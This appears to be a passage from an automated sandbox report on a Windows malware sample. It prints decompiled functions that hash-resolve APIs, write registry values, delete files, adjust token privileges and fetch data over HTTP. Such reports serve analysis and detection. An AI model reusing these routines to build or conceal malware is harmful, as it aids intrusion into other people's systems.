0x000e2240
0x000e2240
0x000e22b2
0x000e22b2
0x00000000
0x000e2216
0x000e2216
0x000e2216
0x000e22c8
0x000e22d1

APIs

RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 000E2210
RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 000E228E

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c21274959b6386e64019958d2eec60caeb902cba88aa17351dd5b120125669bc
Instruction ID: 77790662ac8b8cce0ea0468da7664d5b06826196a9cf4b892891293609387b1d
Opcode Fuzzy Hash: c21274959b6386e64019958d2eec60caeb902cba88aa17351dd5b120125669bc
Instruction Fuzzy Hash: 272186B1A40259BFEB20AA919C43FFF7668AB14714F140438FB14762D2E6A1A924D6B1

Uniqueness

Uniqueness Score: -1.00%

Function 000F5420, Relevance: 3.1, APIs: 2, Instructions: 72
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E000F5420(WCHAR* _a4) {
				void* _t4;
				signed char _t5;
				long _t7;
				intOrPtr* _t10;
				intOrPtr* _t12;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;
				WCHAR* _t18;
				void* _t19;
				void* _t20;
				void* _t22;
				void* _t23;

				_t18 = _a4;
				_t17 = 0;
				while(1) {
					E000EBF50(0, 0, 0xad68947);
					_t4 = CreateFileW(_t18, 0x40000000, 7, 0, 2, 0x4000000, 0); // executed
					_t19 = _t4;
					_t5 = E000E4A90(_t4, 0);
					_t22 = _t20 + 0x10;
					_t28 = _t5 & 0x00000001;
					if((_t5 & 0x00000001) == 0) {
						_t15 = E000EBF50(_t28, 0, 0xb8e7db5);
						_t22 = _t22 + 8;
						 *_t15(_t19);
					}
					E000EBF50(_t28, 0, 0xbf8ba27);
					_t23 = _t22 + 8;
					_t7 = GetFileAttributesW(_t18); // executed
					_t29 = _t7 - 0xffffffff;
					if(_t7 == 0xffffffff) {
						break;
					}
					_t10 = E000EBF50(_t29, 0, 0xad64007);
					 *_t10(_t18);
					_t12 = E000EBF50(_t29, 0, 0x7a2bc0);
					 *_t12(0xbb8);
					_t17 = _t17 + 1;
					_t14 = E000E9D50(0x647400a6);
					_t20 = _t23 + 0x14;
					if(_t17 != _t14) {
						continue;
					}
					break;
				}
				E000EB570(_t18);
				return 0;
			}

0x000f5426
0x000f5429
0x000f5430
0x000f5437
0x000f5452
0x000f5454
0x000f5459
0x000f545e
0x000f5461
0x000f5463
0x000f546c
0x000f5471
0x000f5475
0x000f5475
0x000f547e
0x000f5483
0x000f5487
0x000f5489
0x000f548c
0x00000000
0x00000000
0x000f5495
0x000f549e
0x000f54a7
0x000f54b4
0x000f54b6
0x000f54bc
0x000f54c1
0x000f54c6
0x00000000
0x00000000
0x00000000
0x000f54c6
0x000f54cd
0x000f54db

APIs

CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000002,04000000,00000000), ref: 000F5452
GetFileAttributesW.KERNEL32(?), ref: 000F5487

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: fde2cf5772e31156128805affba83f59b84452cbd6b3a1262e2b678172fd21ee
Instruction ID: 3b5351b1806782cf3cf595bf18a0d37ddb01f0d1f91e480c4d56fd92c209eb2b
Opcode Fuzzy Hash: fde2cf5772e31156128805affba83f59b84452cbd6b3a1262e2b678172fd21ee
Instruction Fuzzy Hash: D80148A6A853583AE16032B53C43FBE31588BA2B2BF150130FB5CB91C3FA857A1514B7

Uniqueness

Uniqueness Score: -1.00%

Function 000F3D80, Relevance: 3.1, APIs: 2, Instructions: 72
registryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E000F3D80(void* __eflags, void* _a4, short* _a8, short* _a12, int _a16, char* _a20, int _a24) {
				void* _t12;
				signed char _t13;
				void* _t14;
				long _t17;
				void* _t18;
				signed int _t21;
				intOrPtr* _t22;
				char* _t28;
				signed int _t29;

				_t44 = __eflags;
				_t13 = E000F5000(_t12, __eflags, 0xffffffff);
				_t14 = E000E9D50(0x647400a5);
				E000EBF50(_t44, _t14, E000E9D50(0x63c03c4b));
				_t17 = RegCreateKeyExW(_a4, _a8, 0, 0, 0, (_t13 & 0x000000ff) << 0x00000008 | 0x00000002, 0,  &_a4, 0); // executed
				if(_t17 == 0) {
					_t28 = _a20;
					_t18 = E000E9D50(0x647400a5);
					E000EBF50(__eflags, _t18, E000E9D50(0x69a6701b));
					_t21 = RegSetValueExW(_a4, _a12, 0, _a16, _t28, _a24); // executed
					__eflags = _t21;
					_t10 = _t21 == 0;
					__eflags = _t10;
					_t29 = _t28 & 0xffffff00 | _t10;
					_t22 = E000EBF50(_t10, 9, 0x3111c69);
					 *_t22(_a4);
				} else {
					_t29 = 0;
				}
				return _t29;
			}

0x000f3d80
0x000f3d8b
0x000f3da1
0x000f3dba
0x000f3dd5
0x000f3dd9
0x000f3ddf
0x000f3dea
0x000f3e03
0x000f3e18
0x000f3e1a
0x000f3e1c
0x000f3e1c
0x000f3e1c
0x000f3e26
0x000f3e31
0x000f3ddb
0x000f3ddb
0x000f3ddb
0x000f3e39

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,?,00000002,?,00000000), ref: 000F3DD5
RegSetValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 000F3E18

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: CreateValue
String ID:
API String ID: 2259555733-0
Opcode ID: 96e8cb35c373eb8ba011f26dd568d909fbde63113441cb5beea8bdcf5d9670c8
Instruction ID: 92ceb30d92a2721cbe3ad8cf79959f5dadbca1201e12086f344317ac6a208006
Opcode Fuzzy Hash: 96e8cb35c373eb8ba011f26dd568d909fbde63113441cb5beea8bdcf5d9670c8
Instruction Fuzzy Hash: 811106F69002997FEB116AA1AC43FEF360CDB50769F150030FE18A5293E651EE2486F2

Uniqueness

Uniqueness Score: -1.00%

Function 000FB530, Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000FB530(void* __eax, void* __eflags, void* _a4) {
				long _v20;
				int _t11;
				signed char _t16;
				void* _t17;
				int _t19;
				DWORD* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;

				_v20 = 0;
				E000EBF50(__eflags, 9, 0xbd557e);
				_t25 = _t24 + 8;
				_t21 =  &_v20;
				_t11 = GetTokenInformation(_a4, 1, 0, 0, _t21); // executed
				_t23 = 0;
				_t30 = _t11;
				if(_t11 == 0) {
					_t16 = E000E55C0( *((intOrPtr*)(E000EBF50(_t30, 0, E000E9D50(0x68042b4e))))(), 0x7a);
					_t25 = _t25 + 0x14;
					if((_t16 & 0x00000001) != 0) {
						_t17 = E000E8290(_v20);
						_t25 = _t25 + 4;
						_t32 = _t17;
						if(_t17 != 0) {
							_t22 = _t17;
							E000EBF50(_t32, 9, 0xbd557e);
							_t25 = _t25 + 8;
							_t19 = GetTokenInformation(_a4, 1, _t22, _v20, _t21); // executed
							_t23 = _t22;
							if(_t19 == 0) {
								E000EB570(_t22);
								_t25 = _t25 + 4;
								_t23 = 0;
							}
						}
					}
				}
				return _t23;
			}

0x000fb537
0x000fb545
0x000fb54a
0x000fb54d
0x000fb55a
0x000fb55c
0x000fb55e
0x000fb560
0x000fb57f
0x000fb584
0x000fb589
0x000fb58e
0x000fb593
0x000fb596
0x000fb598
0x000fb59a
0x000fb5a3
0x000fb5a8
0x000fb5b5
0x000fb5b9
0x000fb5bb
0x000fb5be
0x000fb5c3
0x000fb5c6
0x000fb5c6
0x000fb5bb
0x000fb598
0x000fb589
0x000fb5d1

APIs

GetTokenInformation.KERNELBASE(000EADD7,00000001,00000000,00000000,?,000EADD7,00000000), ref: 000FB55A

Part of subcall function 000E8290: RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 000E82E8

Part of subcall function 000EBF50: LoadLibraryA.KERNEL32(?), ref: 000EC1A1

GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 000FB5B5

Part of subcall function 000EB570: HeapFree.KERNEL32(00000000,000F54D2,000F54D2,?), ref: 000EB593

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: HeapInformationToken$AllocateFreeLibraryLoad
String ID:
API String ID: 4190244075-0
Opcode ID: e9df4782b3d0bedd82831b1e8aec7463e4f43b0cfaf2e9cbd653cad5c26c96fd
Instruction ID: d94e829644e822e7e0363a01661d3eb91008f25fb60410353fc579052bbb6bd7
Opcode Fuzzy Hash: e9df4782b3d0bedd82831b1e8aec7463e4f43b0cfaf2e9cbd653cad5c26c96fd
Instruction Fuzzy Hash: F80188B2E807193AEA2165B5AC43FBF795D9F50B59F040430FA0CB5193F6519E1485A2

Uniqueness

Uniqueness Score: -1.00%

Function 000EE030, Relevance: 3.1, APIs: 2, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E000EE030(void* __eflags, void* _a4, short* _a8, short* _a12) {
				void* _t9;
				long _t12;
				signed int _t14;
				intOrPtr* _t15;
				int _t20;
				signed int _t21;

				_t31 = __eflags;
				_t20 = (E000F5000(_t9, __eflags, 0xffffffff) & 0x000000ff) << 0x00000008 | 0x00000001;
				E000EBF50(_t31, 9, 0xda29a27);
				_t12 = RegOpenKeyExW(_a4, _a8, 0, _t20,  &_a4); // executed
				if(_t12 == 0) {
					E000EBF50(__eflags, 9, 0x8097c7);
					_t14 = RegQueryValueExW(_a4, _a12, 0, 0, 0, 0); // executed
					__eflags = _t14;
					_t7 = _t14 == 0;
					__eflags = _t7;
					_t21 = _t20 & 0xffffff00 | _t7;
					_t15 = E000EBF50(_t7, 9, 0x3111c69);
					 *_t15(_a4);
				} else {
					_t21 = 0;
				}
				return _t21;
			}

0x000ee030
0x000ee04c
0x000ee056
0x000ee067
0x000ee06b
0x000ee07b
0x000ee08f
0x000ee091
0x000ee093
0x000ee093
0x000ee093
0x000ee09d
0x000ee0a8
0x000ee06d
0x000ee06d
0x000ee06d
0x000ee0b0

APIs

RegOpenKeyExW.KERNEL32(00000000,80000001,00000000,00000000,?,?,?,?), ref: 000EE067
RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 000EE08F

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: OpenQueryValue
String ID:
API String ID: 4153817207-0
Opcode ID: ba845f99c816f10e3afb464f6cd32466dff0bc6268915f2d271595faa71088cd
Instruction ID: bb95a9487f316486aad6169ced8478ae33ff9f357b5ebb539e15baca065e2ab7
Opcode Fuzzy Hash: ba845f99c816f10e3afb464f6cd32466dff0bc6268915f2d271595faa71088cd
Instruction Fuzzy Hash: 3501D6766813593EEB1059A69C43FEB3608DB80B65F140130FA1CBA1C2EAD1BA1586A1

Uniqueness

Uniqueness Score: -1.00%

Function 000E3F90, Relevance: 3.1, APIs: 2, Instructions: 53
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000E3F90(void* _a4, intOrPtr _a8) {
				intOrPtr _t4;
				long _t8;
				void* _t10;
				void* _t14;
				void* _t15;
				long _t17;

				_t4 = _a8;
				_t25 = _t4;
				if(_t4 == 0) {
					return 0;
				}
				_t8 = E000E22E0(_t25, E000E1460(_t25, _t4, 0x8f5419a3) + 4, 0x8f5419a3);
				_t26 = _a4;
				_t17 = _t8;
				if(_a4 == 0) {
					E000EBF50(__eflags, 0, 0x8685de3);
					_t10 = RtlAllocateHeap( *0x102124, 8, _t17); // executed
					return _t10;
				}
				E000EBF50(_t26, 0, E000E9D50(0x6caeab8f));
				_t15 =  *0x102124; // 0x510000
				_t14 = RtlReAllocateHeap(_t15, E000E9D50(0x647400a4), _a4, _t17); // executed
				return _t14;
			}

0x000e3f96
0x000e3f99
0x000e3f9b
0x00000000
0x000e3ffb
0x000e3fb4
0x000e3fbc
0x000e3fc0
0x000e3fc2
0x000e4006
0x000e4017
0x00000000
0x000e4017
0x000e3fd4
0x000e3fdc
0x000e3ff7
0x00000000

APIs

RtlReAllocateHeap.NTDLL(00510000,00000000,00000000,00000000), ref: 000E3FF7
RtlAllocateHeap.NTDLL(00000008,00000000), ref: 000E4017

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 14ad871ce9012603bd3cb79bf095ccd9f6268446aace22dd95a6b255355de9fb
Instruction ID: fe7b7d7c24d1f42028ed0a5f75153bd4f29702c7fd635418976d0605ec6360ec
Opcode Fuzzy Hash: 14ad871ce9012603bd3cb79bf095ccd9f6268446aace22dd95a6b255355de9fb
Instruction Fuzzy Hash: 830186F6905185BFE7112662FC07FAB369C9B5539DF050030F90DB6243E9719A2486B2

Uniqueness

Uniqueness Score: -1.00%

Function 000F9C40, Relevance: 2.5, APIs: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000F9C40(void* __eflags, void** _a4) {
				int _t6;
				int _t8;
				void** _t10;
				void* _t11;
				void* _t12;

				_t10 = _a4;
				_t6 = E000E4A90( *_t10, 0);
				_t12 = _t11 + 8;
				_t15 = _t6 & 0x00000001;
				if((_t6 & 0x00000001) == 0) {
					E000EBF50(_t15, 0, 0xb1fd105);
					_t12 = _t12 + 8;
					_t6 = VirtualFree( *_t10, 0, 0x8000); // executed
				}
				_t16 = _t10[2];
				if(_t10[2] != 0) {
					E000EBF50(_t16, 0, 0xb8e7db5);
					_t8 = CloseHandle(_t10[2]); // executed
					return _t8;
				}
				return _t6;
			}

0x000f9c44
0x000f9c4b
0x000f9c50
0x000f9c53
0x000f9c55
0x000f9c5e
0x000f9c63
0x000f9c6f
0x000f9c6f
0x000f9c71
0x000f9c75
0x000f9c7e
0x000f9c89
0x00000000
0x000f9c89
0x000f9c8d

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?), ref: 000F9C6F
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 000F9C89

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: CloseFreeHandleVirtual
String ID:
API String ID: 2443081362-0
Opcode ID: a4f2532af7a3c8ab7226c92353103c1daa717502fab38bd949c9bf743f9d1cf9
Instruction ID: bc847d50a80e78b5c836f73774f4cb56efe52fdb9b587836c0c0d0143560bd3c
Opcode Fuzzy Hash: a4f2532af7a3c8ab7226c92353103c1daa717502fab38bd949c9bf743f9d1cf9
Instruction Fuzzy Hash: C4E06835680304BAEA3036A1FC07F9432844F10B42F004030FB8C350E6E6A238109AA1

Uniqueness

Uniqueness Score: -1.00%

Function 000EBF50, Relevance: 1.7, APIs: 1, Instructions: 182
libraryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E000EBF50(void* __eflags, signed int _a4, signed int _a8) {
				signed int* _v20;
				char _v52;
				char _v159;
				signed int _t32;
				intOrPtr _t35;
				struct HINSTANCE__* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed int _t51;
				signed int* _t52;
				signed int _t57;
				signed int _t58;
				signed int _t60;
				void* _t61;
				void* _t62;

				_t60 = _a8;
				_t32 = E000E9D50(0x647402c4);
				_t62 = _t61 + 4;
				_t57 = _t60 % _t32;
				_t35 =  *((intOrPtr*)(0x102cb8 + _t57 * 4));
				_t58 = _t57;
				if(_t35 == 0) {
					L4:
					_t51 = _a4;
					_v20 = 0x102cb8 + _t58 * 4;
					if(_t51 > 0x23) {
						L39:
						_t37 =  *(0x102134 + _t51 * 4);
						if( *(0x102134 + _t51 * 4) != 0) {
							L49:
							_t38 = E000ED830(_t37, _t60);
							_t52 = _v20;
							__eflags = _t38;
							if(__eflags != 0) {
								L52:
								 *_t52 = _t60;
								 *(0x104198 + _t58 * 4) = _t38;
								return _t38;
							}
							_t39 = E000EBF50(__eflags, 0, 0xba94474);
							 *_t39(0);
							L51:
							_t38 = 0;
							goto L52;
						}
						if(_t51 == 0x17) {
							_t37 =  *0x1037cc; // 0x0
							__eflags = _t37;
							if(__eflags != 0) {
								L48:
								 *(0x102134 + _t51 * 4) = _t37;
								goto L49;
							}
							L46:
							_t41 = E000EBF50(_t77, 0, 0xba94474);
							 *_t41(0);
							 *(0x102134 + _t51 * 4) = 0;
							_t52 = _v20;
							goto L51;
						}
						if(_t51 == 0x16) {
							_t37 =  *0x104b38; // 0x0
							__eflags = _t37;
							if(__eflags == 0) {
								goto L46;
							}
							goto L48;
						}
						if(_t51 != 0x15) {
							_t37 = LoadLibraryA( &_v52); // executed
							__eflags = _t37;
							if(__eflags != 0) {
								goto L48;
							}
							goto L46;
						}
						_t37 =  *0x1037d0; // 0x0
						_t77 = _t37;
						if(_t37 != 0) {
							goto L48;
						}
						goto L46;
					}
					switch( *((intOrPtr*)(_t51 * 4 +  &M001000B0))) {
						case 0:
							L38:
							E000EC560( &_v52, E000ED0A0(0x100550, 0x100550,  &_v159), 0xffffffff);
							_t62 = _t62 + 0x14;
							goto L39;
						case 1:
							goto L38;
						case 2:
							__eax = 0x100bfc;
							goto L38;
						case 3:
							__eax = 0x100894;
							goto L38;
						case 4:
							__eax = 0x101044;
							goto L38;
						case 5:
							__eax = 0x1005e2;
							goto L38;
						case 6:
							__eax = 0x1007e9;
							goto L38;
						case 7:
							__eax = 0x10043c;
							goto L38;
						case 8:
							__eax = 0x100538;
							goto L38;
						case 9:
							__eax = 0x100781;
							goto L38;
						case 0xa:
							__eax = 0x1009fc;
							goto L38;
						case 0xb:
							__eax = 0x10097c;
							goto L38;
						case 0xc:
							__eax = 0x10101b;
							goto L38;
						case 0xd:
							__eax = 0x1007a6;
							goto L38;
						case 0xe:
							__eax = 0x10068d;
							goto L38;
						case 0xf:
							__eax = 0x100b87;
							goto L38;
						case 0x10:
							__eax = 0x100c24;
							goto L38;
						case 0x11:
							__eax = 0x100b75;
							goto L38;
						case 0x12:
							__eax = 0x1009bc;
							goto L38;
						case 0x13:
							__eax = 0x1004b8;
							goto L38;
						case 0x14:
							__eax = 0x10052c;
							goto L38;
						case 0x15:
							goto L39;
						case 0x16:
							__eax = 0x100814;
							goto L38;
						case 0x17:
							__eax = 0x100900;
							goto L38;
						case 0x18:
							__eax = 0x100480;
							goto L38;
						case 0x19:
							__eax = 0x10076e;
							goto L38;
						case 0x1a:
							__eax = 0x100699;
							goto L38;
						case 0x1b:
							__eax = 0x1004db;
							goto L38;
						case 0x1c:
							__eax = 0x100c31;
							goto L38;
						case 0x1d:
							__eax = 0x100b60;
							goto L38;
						case 0x1e:
							__eax = 0x1009c4;
							goto L38;
						case 0x1f:
							__eax = 0x100a2c;
							goto L38;
						case 0x20:
							__eax = 0x1009a6;
							goto L38;
					}
				}
				0;
				0;
				while(1) {
					_t69 = _t35 - _t60;
					if(_t35 == _t60) {
						break;
					}
					E000E1460(_t69, _t58, 1);
					_t62 = _t62 + 8;
					_t58 =  >  ? 0 : _t58 + 1;
					_t35 =  *((intOrPtr*)(0x102cb8 + _t58 * 4));
					if(_t35 != 0) {
						continue;
					}
					goto L4;
				}
				return  *(0x104198 + _t58 * 4);
			}

0x000ebf5c
0x000ebf64
0x000ebf69
0x000ebf74
0x000ebf76
0x000ebf7d
0x000ebf81
0x000ebfb6
0x000ebfb6
0x000ebfc0
0x000ebfc6
0x000ec0fe
0x000ec0fe
0x000ec107
0x000ec163
0x000ec165
0x000ec16d
0x000ec170
0x000ec172
0x000ec189
0x000ec189
0x000ec18b
0x00000000
0x000ec18b
0x000ec17b
0x000ec185
0x000ec187
0x000ec187
0x00000000
0x000ec187
0x000ec10c
0x000ec127
0x000ec12c
0x000ec12e
0x000ec15c
0x000ec15c
0x00000000
0x000ec15c
0x000ec130
0x000ec137
0x000ec141
0x000ec143
0x000ec14e
0x00000000
0x000ec14e
0x000ec111
0x000ec153
0x000ec158
0x000ec15a
0x00000000
0x00000000
0x00000000
0x000ec15a
0x000ec116
0x000ec1a1
0x000ec1a7
0x000ec1a9
0x00000000
0x00000000
0x00000000
0x000ec1ab
0x000ec11c
0x000ec121
0x000ec123
0x00000000
0x00000000
0x00000000
0x000ec125
0x000ebfd1
0x00000000
0x000ec0df
0x000ec0f6
0x000ec0fb
0x00000000
0x00000000
0x00000000
0x00000000
0x000ebfee
0x00000000
0x00000000
0x000ebff8
0x00000000
0x00000000
0x000ec002
0x00000000
0x00000000
0x000ec00c
0x00000000
0x00000000
0x000ec016
0x00000000
0x00000000
0x000ec020
0x00000000
0x00000000
0x000ec02a
0x00000000
0x00000000
0x000ec034
0x00000000
0x00000000
0x000ec03e
0x00000000
0x00000000
0x000ec048
0x00000000
0x00000000
0x000ec052
0x00000000
0x00000000
0x000ec05c
0x00000000
0x00000000
0x000ec063
0x00000000
0x00000000
0x000ec06a
0x00000000
0x00000000
0x000ec071
0x00000000
0x00000000
0x000ec078
0x00000000
0x00000000
0x000ec07f
0x00000000
0x00000000
0x000ec086
0x00000000
0x00000000
0x000ec08d
0x00000000
0x00000000
0x00000000
0x00000000
0x000ec094
0x00000000
0x00000000
0x000ec09b
0x00000000
0x00000000
0x000ec0a2
0x00000000
0x00000000
0x000ec0a9
0x00000000
0x00000000
0x000ec0b0
0x00000000
0x00000000
0x000ec0da
0x00000000
0x00000000
0x000ec0b7
0x00000000
0x00000000
0x000ec0be
0x00000000
0x00000000
0x000ec0c5
0x00000000
0x00000000
0x000ec0cc
0x00000000
0x00000000
0x000ec0d3
0x00000000
0x00000000
0x000ebfd1
0x000ebf89
0x000ebf8d
0x000ebf90
0x000ebf90
0x000ebf92
0x00000000
0x00000000
0x000ebf97
0x000ebf9c
0x000ebfa8
0x000ebfab
0x000ebfb4
0x00000000
0x00000000
0x00000000
0x000ebfb4
0x00000000

APIs

LoadLibraryA.KERNEL32(?), ref: 000EC1A1

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 18dd2ea687de4f8552f7f65a05111dc05117a464c2cf4bbe19bf03a25163e7be
Instruction ID: 8a010245d7c935a8398deb139ef760486578b90d24b59ce4dcf5b855acc2e2c5
Opcode Fuzzy Hash: 18dd2ea687de4f8552f7f65a05111dc05117a464c2cf4bbe19bf03a25163e7be
Instruction Fuzzy Hash: 3851C270748289DFF7216A9A9E80F2D7696974930CF14C036F586FB283D3A3DC825752

Uniqueness

Uniqueness Score: -1.00%

Function 000ED270, Relevance: 1.6, APIs: 1, Instructions: 98
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000ED270(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v30;
				signed short _v32;
				intOrPtr _v40;
				char _v44;
				void* _t22;
				void* _t23;
				intOrPtr _t26;
				void* _t31;
				void* _t32;
				void* _t33;
				void* _t37;
				void* _t43;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t61;
				void* _t62;

				_t22 = E000FFCF0(__ecx);
				_t54 =  &_v44;
				_t23 = E000F0190(__eflags, _t22,  &_v44);
				_t57 = _t56 + 8;
				_t64 = _t23;
				if(_t23 == 0) {
					_t43 = 0;
				} else {
					_t26 = E000FB790(_t64,  *0x102838, _v44, _v32 & 0x0000ffff, _a8); // executed
					_t58 = _t57 + 0x10;
					if(_t26 == 0) {
						_t43 = 0;
					} else {
						_v20 = 1 + (0 | _v30 == 0x00000002) * 4;
						_t31 = E000FF190(__edx);
						_t32 = E000FEE10(__edx);
						_v20 = _t26;
						_t33 = E000FBAD0(_v30 - 2, _t26, _v40, 0, _t32, _t31, _v20); // executed
						_t61 = _t58 - 4 + 0x1c;
						if(_t33 == 0) {
							_t43 = 0;
							_t54 =  &_v44;
						} else {
							_t53 = _t33;
							_t37 = E000E1AF0(_t53,  &_v28, 0,  *0x102c80); // executed
							_t62 = _t61 + 0x10;
							_t68 = _t37;
							_t54 =  &_v44;
							if(_t37 == 0) {
								_t43 = 0;
								__eflags = 0;
							} else {
								E000FF410(_v28, _a4, _v28, _v24 + _v28);
								E000EB570(_v28);
								_t62 = _t62 + 4;
								_t43 = 1;
							}
							E000EBF50(_t68, 0x13, 0x714b685);
							_t61 = _t62 + 8;
							InternetCloseHandle(_t53); // executed
						}
						E000FBA40(_t68, _v20);
						_t58 = _t61 + 4;
					}
					E000FB690(_t54);
				}
				return _t43;
			}

0x000ed27b
0x000ed280
0x000ed285
0x000ed28a
0x000ed28d
0x000ed28f
0x000ed337
0x000ed295
0x000ed2a6
0x000ed2ab
0x000ed2b0
0x000ed33b
0x000ed2b6
0x000ed2ca
0x000ed2cd
0x000ed2d6
0x000ed2e8
0x000ed2ec
0x000ed2f1
0x000ed2f6
0x000ed33f
0x000ed341
0x000ed2f8
0x000ed2f8
0x000ed307
0x000ed30c
0x000ed30f
0x000ed311
0x000ed314
0x000ed346
0x000ed346
0x000ed316
0x000ed323
0x000ed32b
0x000ed330
0x000ed333
0x000ed333
0x000ed34f
0x000ed354
0x000ed358
0x000ed358
0x000ed35e
0x000ed363
0x000ed363
0x000ed367
0x000ed36c
0x000ed378

APIs

Part of subcall function 000FB790: InternetOpenA.WININET(00100580,?,00000000,00000000,00000000,?,000ECD77,?,?,?,00000001,00000000,?,000ECD77,?,00000001), ref: 000FB7C2
Part of subcall function 000FB790: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00000004), ref: 000FB862

Part of subcall function 000FBAD0: HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 000FBBA3

Part of subcall function 000E1AF0: InternetReadFile.WININET(?,?,00040000,00040000), ref: 000E1B86

InternetCloseHandle.WININET(00000000), ref: 000ED358

Part of subcall function 000EB570: HeapFree.KERNEL32(00000000,000F54D2,000F54D2,?), ref: 000EB593

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: Internet$Open$CloseConnectFileFreeHandleHeapHttpReadRequest
String ID:
API String ID: 3651809878-0
Opcode ID: fcd187ff99b27940a0cc36ef104c026b6036cdb856c9e89884543a18d7f4ca3c
Instruction ID: b5112345dcfd3f0bce9f00a0755bfbba59d9c2a1b13a53dbb8d3378804cb1274
Opcode Fuzzy Hash: fcd187ff99b27940a0cc36ef104c026b6036cdb856c9e89884543a18d7f4ca3c
Instruction Fuzzy Hash: 2221C3B2E001596FDF10ABF59C42AFF77B9EF44354F080035FA04B7243E675AA1596A2

Uniqueness

Uniqueness Score: -1.00%

Function 000F0F60, Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E000F0F60(void* __eflags, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v88;
				char _v288;
				void* _t18;
				intOrPtr* _t20;
				void* _t23;
				void* _t24;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				void* _t45;
				void* _t51;
				void* _t52;
				void* _t55;

				_t55 = __eflags;
				_v20 = 0;
				E000F9C90(_t55, E000E7200(0x101060,  &_v88), 1); // executed
				_t18 = E000E9D50(0x647400a5);
				_t20 = E000EBF50(_t55, _t18, E000E9D50(0x6ec8785b));
				_t36 =  !=  ? 0x1008d0 : 0x1010b0;
				_t23 = E000E7200( !=  ? 0x1008d0 : 0x1010b0,  &_v288);
				_t51 = _t45 + 0x28;
				_t24 =  *_t20(_t23, 1,  &_v20, 0);
				_t57 = _t24;
				if(_t24 != 0) {
					_v24 = 0;
					_t26 = E000EBF50(_t57, 9, 0x8a8238c);
					_t52 = _t51 + 8;
					_t27 =  *_t26(_v20,  &_v32,  &_v24,  &_v28);
					_t58 = _t27;
					if(_t27 != 0) {
						_t30 = E000EBF50(_t58, 9, 0x90ec817);
						_t31 = E000E9D50(0x647400bc);
						_t52 = _t52 + 0xc;
						 *_t30(_a4, _a8, _t31, 0, 0, 0, _v24); // executed
					}
					_t28 = E000EBF50(_t58, 0, 0x982abe5);
					 *_t28(_v20);
				}
				return 1;
			}

0x000f0f60
0x000f0f72
0x000f0f8a
0x000f0f97
0x000f0fb0
0x000f0fc6
0x000f0fd1
0x000f0fd6
0x000f0fe2
0x000f0fe4
0x000f0fe6
0x000f0fe8
0x000f0ff6
0x000f0ffb
0x000f100d
0x000f100f
0x000f1011
0x000f101d
0x000f102f
0x000f1034
0x000f1043
0x000f1043
0x000f104c
0x000f1057
0x000f1057
0x000f1065

APIs

Part of subcall function 000F9C90: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 000F9D70

Part of subcall function 000EBF50: LoadLibraryA.KERNEL32(?), ref: 000EC1A1

